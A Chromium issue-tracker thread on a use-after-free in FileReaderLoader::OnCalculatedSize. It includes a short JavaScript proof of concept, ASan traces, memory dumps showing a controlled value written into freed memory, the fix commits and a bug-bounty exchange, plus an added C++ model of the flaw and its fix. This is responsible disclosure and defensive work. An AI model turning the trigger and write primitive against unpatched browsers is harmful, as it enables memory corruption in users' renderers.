Security: FileReader - Use After Free in FileReaderLoader::OnCalculatedSize()
Reported by loobeny...@gmail.com, Apr 22 2018
Issue description
VULNERABILITY DETAILS
Steps to reproduce:
1. Open the PoC UAF_OnCalculatedSize_PoC.html in a Chrome ASan build.
2. ASan reports a use-after-free in FileReaderLoader::OnCalculatedSize().
==13480==ERROR: AddressSanitizer: heap-use-after-free on address 0x125ad07b4348 at pc 0x7ff941011e71 bp 0x00a10f3fb3e0 sp 0x00a10f3fb428
WRITE of size 1 at 0x125ad07b4348 thread T0
#0 0x7ff941011e70 in blink::FileReaderLoader::OnCalculatedSize C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:283
VERSION
Chrome Version: Chromium 68.0.3404.0 (Developer Build) (64-bit)
Operating System: Windows 10
REPRODUCTION CASE (UAF_OnCalculatedSize_PoC.html)
<script>
  var reader = new FileReader();
  // loadstart is dispatched from FileReaderLoader::OnCalculatedSize (via
  // OnStartLoading) while the loader is still on the stack.
  reader.onloadstart = function(e) {
    reader.abort();  // destroys the current FileReaderLoader
    reader.readAsDataURL(new Blob([""], {type : "text/html"}));  // replaces it
  }
  reader.readAsText(new Blob([""], {type : "text/html"}));
</script>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
==13480==ERROR: AddressSanitizer: heap-use-after-free on address 0x125ad07b4348 at pc 0x7ff941011e71 bp 0x00a10f3fb3e0 sp 0x00a10f3fb428
WRITE of size 1 at 0x125ad07b4348 thread T0
#0 0x7ff941011e70 in blink::FileReaderLoader::OnCalculatedSize C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:283
#1 0x7ff93608751c in blink::mojom::blink::BlobReaderClientStubDispatch::Accept C:\b\c\b\win_asan_release\src\out\release_x64\gen\third_party\blink\public\mojom\blob\blob.mojom-blink.cc:133
#2 0x7ff938ac93a7 in mojo::InterfaceEndpointClient::HandleValidatedMessage C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\interface_endpoint_client.cc:419
#3 0x7ff938ab20bf in mojo::internal::MultiplexRouter::ProcessIncomingMessage C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\multiplex_router.cc:865
#4 0x7ff938ab1000 in mojo::internal::MultiplexRouter::Accept C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\multiplex_router.cc:589
#5 0x7ff938ac27f3 in mojo::Connector::ReadSingleMessage C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\connector.cc:443
#6 0x7ff938ac3d5e in mojo::Connector::ReadAllAvailableMessages C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\connector.cc:472
#7 0x7ff938af8fed in mojo::SimpleWatcher::OnHandleReady C:\b\c\b\win_asan_release\src\mojo\public\cpp\system\simple_watcher.cc:273
#8 0x7ff9389cb661 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:101
#9 0x7ff9380fff3c in blink::scheduler::internal::ThreadControllerImpl::DoWork C:\b\c\b\win_asan_release\src\third_party\blink\renderer\platform\scheduler\base\thread_controller_impl.cc:162
#10 0x7ff9389cb661 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:101
#11 0x7ff9388db3cd in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:319
#12 0x7ff9388dc7b7 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:373
#13 0x7ff938a37328 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:37
#14 0x7ff9388c4d14 in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:130
#15 0x7ff93df09859 in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:250
#16 0x7ff9387dbda9 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:633
#17 0x7ff9387dcf2e in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:922
#18 0x7ff9387fca6c in service_manager::Main C:\b\c\b\win_asan_release\src\services\service_manager\embedder\main.cc:452
#19 0x7ff9387db986 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:19
#20 0x7ff9344c1311 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:101
#21 0x7ff7e7747cd6 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:200
#22 0x7ff7e774236a in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:230
#23 0x7ff7e7a87638 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:283
#24 0x7ff9da8d1fe3 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x11fe3)
#25 0x7ff9dd32f060 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x6f060)
0x125ad07b4348 is located 264 bytes inside of 272-byte region [0x125ad07b4240,0x125ad07b4350)
freed by thread T0 here:
#0 0x7ff7e777a930 in free C:\b\rr\tmpf1ermk\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
#1 0x7ff9410126c3 in blink::FileReaderLoader::~FileReaderLoader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:80
#2 0x7ff941014d50 in blink::FileReader::ExecutePendingRead C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:313
#3 0x7ff94101abb1 in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:137
#4 0x7ff941014aed in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:100
#5 0x7ff94101447d in blink::FileReader::ReadInternal C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:306
#6 0x7ff94029a324 in blink::V8FileReader::readAsDataURLMethodCallback C:\b\c\b\win_asan_release\src\out\release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_file_reader.cc:508
#7 0x7ff9362cfa87 in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments-inl.h:93
#8 0x7ff9362cc544 in v8::internal::`anonymous namespace'::HandleApiCallHelper<0> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:107
#9 0x7ff9362c935b in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:137
#10 0x7ff9362c86a6 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:125
#11 0x12b6d8404240 (<unknown module>)
previously allocated by thread T0 here:
#0 0x7ff7e777aa10 in malloc C:\b\rr\tmpf1ermk\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:60
#1 0x7ff935f8d983 in WTF::Partitions::FastMalloc C:\b\c\b\win_asan_release\src\third_party\blink\renderer\platform\wtf\allocator\partitions.h:121
#2 0x7ff94100d871 in blink::FileReaderLoader::Create C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:68
#3 0x7ff941014cbf in blink::FileReader::ExecutePendingRead C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:313
#4 0x7ff94101abb1 in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:137
#5 0x7ff941014aed in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:100
#6 0x7ff94101447d in blink::FileReader::ReadInternal C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:306
#7 0x7ff9410148ec in blink::FileReader::readAsText C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:258
#8 0x7ff940299c0b in blink::V8FileReader::readAsTextMethodCallback C:\b\c\b\win_asan_release\src\out\release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_file_reader.cc:503
#9 0x7ff9362cfa87 in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments-inl.h:93
#10 0x7ff9362cc544 in v8::internal::`anonymous namespace'::HandleApiCallHelper<0> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:107
#11 0x7ff9362c935b in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:137
#12 0x7ff9362c86a6 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:125
#13 0x12b6d8404240 (<unknown module>)
SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:283 in blink::FileReaderLoader::OnCalculatedSize
Shadow bytes around the buggy address:
0x04822a876810: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x04822a876820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x04822a876830: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x04822a876840: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x04822a876850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x04822a876860: fd fd fd fd fd fd fd fd fd[fd]fa fa fa fa fa fa
0x04822a876870: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x04822a876880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x04822a876890: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x04822a8768a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x04822a8768b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==13480==ABORTING
,
Apr 23 2018
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5674396262596608.
,
Apr 23 2018
Detailed report: https://clusterfuzz.com/testcase?key=5674396262596608
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type: Heap-use-after-free WRITE 1
Crash Address: 0x613000049608
Crash State:
blink::FileReaderLoader::OnCalculatedSize
blink::mojom::blink::BlobReaderClientStubDispatch::Accept
mojo::InterfaceEndpointClient::HandleValidatedMessage
Sanitizer: address (ASAN)
Recommended Security Severity: High
Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=523898:523900
Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5674396262596608
See https://github.com/google/clusterfuzz-tools for more information.
The recommended severity is different from what was assigned to the bug. Please double check the accuracy of the assigned severity.
,
Apr 23 2018
Automatically applying components based on crash stacktrace and information from OWNERS files. If this is incorrect, please apply the Test-Predator-Wrong-Components label.
,
Apr 23 2018
It's worse in Stable and Beta.
In Stable and Beta, there is an 8-byte member variable expected_content_size_ and it can corrupt multiple bytes of the freed memory:
void FileReaderLoader::OnCalculatedSize(uint64_t total_size,
                                        uint64_t expected_content_size) {
  OnStartLoading(expected_content_size);
  expected_content_size_ = expected_content_size;  // <--- 8 byte write
  if (expected_content_size_ == 0) {
    received_all_data_ = true;
    return;
  }
In the Dev channel, expected_content_size_ no longer exists; the easiest write to trigger is a one-byte write to received_all_data_:
void FileReaderLoader::OnCalculatedSize(uint64_t total_size,
                                        uint64_t expected_content_size) {
  OnStartLoading(expected_content_size);
  if (expected_content_size == 0) {
    received_all_data_ = true;  // <---------- 1 byte write
    return;
  }
Attached a PoC (UAF_OnCalculatedSize_PoC_WrittenValue_0x414141.html) that can write 0x414141 into the freed memory in Stable and Beta:
Chromium 67.0.3365.0 (Developer Build) (32-bit)
OS: Windows 10
Memory block of FileReaderLoader before it's freed.
0x57284390 5c 57 03 2b 02 00 00 00 30 f1 d4 58 00 00 00 00 \W.+....0ñÔX....
0x572843A0 20 62 86 38 00 00 00 00 00 ab ab ab 00 00 00 00 b.8.....«««....
0x572843B0 00 00 00 00 00 00 00 00 18 fa 4a 2d 00 00 00 00 .........úJ-....
0x572843C0 00 00 00 00 00 ab ab ab 00 00 00 00 00 00 00 00 .....«««........
0x572843D0 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 ÿÿÿÿÿÿÿÿ........
0x572843E0 00 00 00 00 3f 01 00 00 00 00 00 00 00 00 00 00 ....?...........
0x572843F0 90 6a f9 39 00 00 00 00 40 24 76 03 01 ab ab ab .jù9....@$v..«««
0x57284400 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <...............
0x57284410 00 00 00 00 00 ab ab ab 6a 57 03 2b 00 00 00 00 .....«««jW.+....
0x57284420 e8 43 28 57 30 42 9d 36 90 5c 9d 36 00 00 00 00 èC(W0B.6.\.6....
0x57284430 24 44 28 57 f4 58 03 2b 90 43 28 57 ab ab ab ab $D(WôX.+.C(W««««
0x57284440 ff ff ff ff ff ff ff ff 00 00 01 ab ab ab ab ab ÿÿÿÿÿÿÿÿ...«««««
0x57284450 de ad be ef ca fe d0 0d 13 37 f0 05 ba 11 ab 1e Þ..ïÊþÐ..7ð.º.«.
0x57284460 57 28 45 40 00 00 00 00 00 00 00 00 00 00 00 00 W(E@............
0x57284470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- this 0x57284390 {read_type_=kReadAsText (0x00000002) client_=0x58d4f130 {mixin_constructor_marker_={...} ...} ...} blink::FileReaderLoader *
+ blink::mojom::blink::BlobReaderClient {...} blink::mojom::blink::BlobReaderClient
read_type_ kReadAsText (0x00000002) blink::FileReaderLoader::ReadType
+ client_ 0x58d4f130 {mixin_constructor_marker_={...} state_=kLoading (0x00000001) loading_state_=kLoadingStateLoading (0x00000002) ...} blink::FileReaderLoaderClient * {blink::FileReader}
+ encoding_ {name_=0x00000000 <NULL> } WTF::TextEncoding
+ data_type_ [0x00000018] "application/octet-binary" WTF::String
+ raw_data_ empty std::unique_ptr<WTF::ArrayBufferBuilder,std::default_delete<WTF::ArrayBufferBuilder> >
is_raw_data_converted_ false bool
+ array_buffer_result_ null blink::Persistent<blink::DOMArrayBuffer>
+ string_result_ (null) WTF::String
+ decoder_ empty std::unique_ptr<blink::TextResourceDecoder,std::default_delete<blink::TextResourceDecoder> >
finished_loading_ false bool
bytes_loaded_ 0x0000000000000000 __int64
total_bytes_ 0xffffffffffffffff __int64
memory_usage_reported_to_v8_ 0x0000000000000000 __int64
error_code_ kOK (0x00000000) blink::FileError::ErrorCode
+ consumer_handle_ {handle_={...} } mojo::ScopedHandleBase<mojo::DataPipeConsumerHandle>
+ handle_watcher_ {sequence_checker_={...} arming_policy_=AUTOMATIC (0x00000000) task_runner_=[0x2d180760] 0x03762440 {queue_type_=kDefault (0x00000001) queue_class_=kNone (0x00000000) can_be_blocked_=false ...} ...} mojo::SimpleWatcher
+ binding_ {internal_state_={stub_={sink_=0x57284390 {read_type_=kReadAsText (0x00000002) client_=0x58d4f130 {mixin_constructor_marker_=...} ...} } } } mojo::Binding<blink::mojom::blink::BlobReaderClient,mojo::RawPtrImplRefTraits<blink::mojom::blink::BlobReaderClient> >
expected_content_size_ 0xffffffffffffffff __int64
received_all_data_ false bool
received_on_complete_ false bool
started_loading_ true bool
expected_content_size 0x0000000000414141 unsigned __int64
total_size 0x0000000000414141 unsigned __int64
Memory block of FileReaderLoader after it's freed:
0x57284390 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843A0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843B0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843C0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843D0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843E0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843F0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284400 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284410 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284420 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284430 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284440 41 41 41 00 00 00 00 00 cd cd cd cd cd cd cd cd AAA.....ÍÍÍÍÍÍÍÍ
0x57284450 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284460 57 28 45 40 00 00 00 00 00 00 00 00 00 00 00 00 W(E@............
- this 0x57284390 {read_type_=0xcdcdcdcd client_=0xcdcdcdcd {...} encoding_={name_=0xcdcdcdcd <Error reading characters of string.> } ...} blink::FileReaderLoader *
+ blink::mojom::blink::BlobReaderClient {...} blink::mojom::blink::BlobReaderClient
read_type_ 0xcdcdcdcd blink::FileReaderLoader::ReadType
+ client_ 0xcdcdcdcd {...} blink::FileReaderLoaderClient *
+ encoding_ {name_=0xcdcdcdcd <Error reading characters of string.> } WTF::TextEncoding
+ data_type_ [???] ??? WTF::String
+ raw_data_ unique_ptr {bytes_used_=??? variable_capacity_=??? buffer_=[???] ??? ??? } std::unique_ptr<WTF::ArrayBufferBuilder,std::default_delete<WTF::ArrayBufferBuilder> >
is_raw_data_converted_ true (0xcd) bool
+ array_buffer_result_ {...} blink::Persistent<blink::DOMArrayBuffer>
+ string_result_ [???] ??? WTF::String
+ decoder_ unique_ptr {options_={encoding_detection_option_=??? content_type_=??? default_encoding_={name_=??? } ...} encoding_=...} std::unique_ptr<blink::TextResourceDecoder,std::default_delete<blink::TextResourceDecoder> >
finished_loading_ true (0xcd) bool
bytes_loaded_ 0xcdcdcdcdcdcdcdcd __int64
total_bytes_ 0xcdcdcdcdcdcdcdcd __int64
memory_usage_reported_to_v8_ 0xcdcdcdcdcdcdcdcd __int64
error_code_ 0xcdcdcdcd blink::FileError::ErrorCode
+ consumer_handle_ {handle_={...} } mojo::ScopedHandleBase<mojo::DataPipeConsumerHandle>
+ handle_watcher_ {sequence_checker_={...} arming_policy_=MANUAL | 0xcdcdcdcc (0xcdcdcdcd) task_runner_=[???] 0xcdcdcdcd {...} ...} mojo::SimpleWatcher
+ binding_ {internal_state_={stub_={sink_=0xcdcdcdcd {...} } } } mojo::Binding<blink::mojom::blink::BlobReaderClient,mojo::RawPtrImplRefTraits<blink::mojom::blink::BlobReaderClient> >
expected_content_size_ 0x0000000000414141 __int64
received_all_data_ true (0xcd) bool
received_on_complete_ true (0xcd) bool
started_loading_ true (0xcd) bool
expected_content_size 0x0000000000414141 unsigned __int64
total_size 0x0000000000414141 unsigned __int64
Huh, this is weird... if FileReaderLoader is deleted (as is clearly the case here), its mojo::Binding binding_ member should also be deleted, which as far as I know should prevent any more messages from being dispatched through that binding... But clearly something isn't working right here.
,
Apr 23 2018
The following revision refers to this bug:
https://chromium.googlesource.com/chromium/src.git/+/a261ea1c56ef16fc0fc4af1e440feb302d577716
commit a261ea1c56ef16fc0fc4af1e440feb302d577716
Author: Marijn Kruisselbrink <mek@chromium.org>
Date: Mon Apr 23 20:17:19 2018
Fix use-after-free in FileReaderLoader.
Anything that calls out to client_ can cause FileReaderLoader to be destroyed, so make sure to check for that situation.
Bug: 835639
Change-Id: I57533d41b7118c06da17abec28bbf301e1f50646
Reviewed-on: https://chromium-review.googlesource.com/1024450
Commit-Queue: Marijn Kruisselbrink <mek@chromium.org>
Commit-Queue: Daniel Murphy <dmurph@chromium.org>
Reviewed-by: Daniel Murphy <dmurph@chromium.org>
Cr-Commit-Position: refs/heads/master@{#552807}
[modify] https://crrev.com/a261ea1c56ef16fc0fc4af1e440feb302d577716/third_party/blink/renderer/core/fileapi/file_reader_loader.cc
[modify] https://crrev.com/a261ea1c56ef16fc0fc4af1e440feb302d577716/third_party/blink/renderer/core/fileapi/file_reader_loader.h
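The re-entrancy behind this bug, and the shape of the check the fix commit describes, can be modelled in a few dozen lines. The following is an added example written for this page; it is not Chromium code, not the reporter's PoC and not the fix CL. Reader, Loader, OnLoadStart, Read and Abort are simplified stand-ins for FileReader, FileReaderLoader, the client_ callback, readAsText/readAsDataURL and abort(). Ownership is a shared_ptr instead of Blink's unique_ptr only so the harness can keep the released object mapped and observe the stale writes from comment 9 (the controlled 8-byte expected_content_size_ write and the 1-byte received_all_data_ write); std::weak_ptr is an assumed stand-in for whatever liveness check the real patch uses, which this page does not show.

```cpp
// Added example (not Chromium code): re-entrant destruction of a loader from
// inside a callback it issued, and a weak-handle check that survives it.
#include <cstdint>
#include <memory>

class Loader;

// Stand-in for blink::FileReader: owns the loader and is its client_.
struct Reader {
  std::shared_ptr<Loader> loader;   // unique_ptr in Blink; shared here only so
                                    // the harness can keep freed memory observable
  int reads_started = 0;
  bool abort_on_loadstart = false;  // models the PoC's onloadstart handler

  void Read();                      // readAsText()/readAsDataURL(): new loader
  void Abort() { loader.reset(); }  // abort(): destroys the current loader
  // client_ callback fired from OnStartLoading(); runs the JS loadstart handler.
  void OnLoadStart() {
    if (abort_on_loadstart) {
      Abort();  // frees the loader that is still executing OnCalculatedSize
      Read();   // and a new loader takes its place
    }
  }
};

class Loader : public std::enable_shared_from_this<Loader> {
 public:
  explicit Loader(Reader* client) : client_(client) {}

  // Pre-fix shape: call out to the client, then write members. If the callout
  // destroyed *this*, both writes land in freed memory. Returns true when the
  // writes hit a loader the owner no longer holds (harness-only check).
  bool OnCalculatedSizeUnsafe(std::uint64_t expected_content_size) {
    Reader* client = client_;
    client->OnLoadStart();                           // may delete *this*
    bool dangling = client->loader.get() != this;    // observable only in this model
    expected_content_size_ = expected_content_size;  // 8-byte write, value = blob size
    if (expected_content_size_ == 0)
      received_all_data_ = true;                     // 1-byte write
    return dangling;
  }

  // Hardened shape: take a weak handle before the callout, re-check after.
  // Returns false when the loader died during the callout; no member is touched.
  bool OnCalculatedSizeSafe(std::uint64_t expected_content_size) {
    std::weak_ptr<Loader> self = shared_from_this();
    Reader* client = client_;
    client->OnLoadStart();
    if (self.expired())
      return false;  // destroyed by the client: stop before any member access
    expected_content_size_ = expected_content_size;
    if (expected_content_size_ == 0)
      received_all_data_ = true;
    return true;
  }

  std::uint64_t expected_content_size() const { return expected_content_size_; }
  bool received_all_data() const { return received_all_data_; }

 private:
  Reader* client_;
  std::uint64_t expected_content_size_ = ~std::uint64_t{0};
  bool received_all_data_ = false;
};

void Reader::Read() {
  loader = std::make_shared<Loader>(this);
  ++reads_started;
}

// PoC sequence against the pre-fix shape. The harness keeps one extra reference
// so the stale write is observable instead of crashing; under unique_ptr
// ownership it is the heap-use-after-free ASan reported. Returns the value the
// stale write deposited in the released loader (0 if no stale write happened).
std::uint64_t UnsafeWriteIntoReleasedLoader(std::uint64_t blob_size) {
  Reader reader;
  reader.abort_on_loadstart = true;
  reader.Read();
  std::shared_ptr<Loader> released = reader.loader;  // harness keep-alive
  bool dangling = released->OnCalculatedSizeUnsafe(blob_size);
  return dangling ? released->expected_content_size() : 0;
}

// Same sequence against the hardened shape, with real destruction: true iff the
// stale loader bailed out and the replacement read is in place.
bool SafePathBailsOut() {
  Reader reader;
  reader.abort_on_loadstart = true;
  reader.Read();
  Loader* stale = reader.loader.get();  // raw, so Abort() really frees it
  bool completed = stale->OnCalculatedSizeSafe(0x414141);
  return !completed && reader.reads_started == 2 && reader.loader != nullptr;
}

// Non-reentrant case: the hardened path still completes its normal work.
bool SafePathNormalCase() {
  Reader reader;
  reader.Read();
  bool completed = reader.loader->OnCalculatedSizeSafe(0);
  return completed && reader.loader->received_all_data();
}
```

The pattern to take away is the one the commit message states: every call that can reach script (here, anything through client_) may delete the object making the call, so any member access after such a call must be preceded by a liveness check on a handle captured before it.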
,
Apr 24 2018
ClusterFuzz has detected this issue as fixed in range 552805:552808.
Detailed report: https://clusterfuzz.com/testcase?key=5674396262596608
Job Type: linux_asan_chrome_mp
Platform Id: linux
Crash Type: Heap-use-after-free WRITE 1
Crash Address: 0x613000049608
Crash State:
blink::FileReaderLoader::OnCalculatedSize
blink::mojom::blink::BlobReaderClientStubDispatch::Accept
mojo::InterfaceEndpointClient::HandleValidatedMessage
Sanitizer: address (ASAN)
Recommended Security Severity: High
Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=523898:523900
Fixed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=552805:552808
Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5674396262596608
See https://github.com/google/clusterfuzz-tools for more information.
If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Apr 24 2018
ClusterFuzz testcase 5674396262596608 is verified as fixed, so closing issue as verified. If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.
,
Apr 24 2018
I don't know if this is serious enough to also warrant merging back to M66, but just in case, adding that merge request as well...
,
Apr 24 2018
This bug requires manual review: Request affecting a post-stable build
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), josafat@(ChromeOS), abdulsyed@(Desktop)
For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 24 2018
+ awhalley - can you please review how critical this is?
,
Apr 24 2018
Your change meets the bar and is auto-approved for M67. Please go ahead and merge the CL to branch 3396 manually.
Please contact milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), govind@(Desktop)
For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 24 2018
We can wait to 67.
,
Apr 24 2018
The following revision refers to this bug:
https://chromium.googlesource.com/chromium/src.git/+/4c85c11d136df02e49f14d18f3b97bbf9413772f
commit 4c85c11d136df02e49f14d18f3b97bbf9413772f
Author: Marijn Kruisselbrink <mek@chromium.org>
Date: Tue Apr 24 20:40:29 2018
Fix use-after-free in FileReaderLoader.
Anything that calls out to client_ can cause FileReaderLoader to be destroyed, so make sure to check for that situation.
TBR=mek@chromium.org
(cherry picked from commit a261ea1c56ef16fc0fc4af1e440feb302d577716)
Bug: 835639
Change-Id: I57533d41b7118c06da17abec28bbf301e1f50646
Reviewed-on: https://chromium-review.googlesource.com/1024450
Commit-Queue: Marijn Kruisselbrink <mek@chromium.org>
Commit-Queue: Daniel Murphy <dmurph@chromium.org>
Reviewed-by: Daniel Murphy <dmurph@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#552807}
Reviewed-on: https://chromium-review.googlesource.com/1026524
Reviewed-by: Marijn Kruisselbrink <mek@chromium.org>
Cr-Commit-Position: refs/branch-heads/3396@{#265}
Cr-Branched-From: 9ef2aa869bc7bc0c089e255d698cca6e47d6b038-refs/heads/master@{#550428}
[modify] https://crrev.com/4c85c11d136df02e49f14d18f3b97bbf9413772f/third_party/blink/renderer/core/fileapi/file_reader_loader.cc
[modify] https://crrev.com/4c85c11d136df02e49f14d18f3b97bbf9413772f/third_party/blink/renderer/core/fileapi/file_reader_loader.h
,
May 4 2018
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products.
Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
,
May 4 2018
Nice one loobenyang@ - $3,000 for this one!
,
May 7 2018
Thanks Andrew and the team for the quick fix. Does comment 9 qualify for a higher reward? https://bugs.chromium.org/p/chromium/issues/detail?id=835639#c9
Sure, this time I did not demonstrate control of the EIP register, but it does demonstrate control of the value used to corrupt the memory. The exploit of this issue is very likely. And according to the Chrome Reward Program Rules, control of EIP is not the only criterion for a higher reward:
"[2] A report that includes a minimized test case and the versions of Chrome affected by the bug. You will also demonstrate that exploitation of this vulnerability is very likely (e.g. good control of EIP or another CPU register). Your report should be brief and well written with only necessary detail and commentary."
If you have already taken it into consideration and the amount was decided based on it, then just ignore this comment. Thanks again.
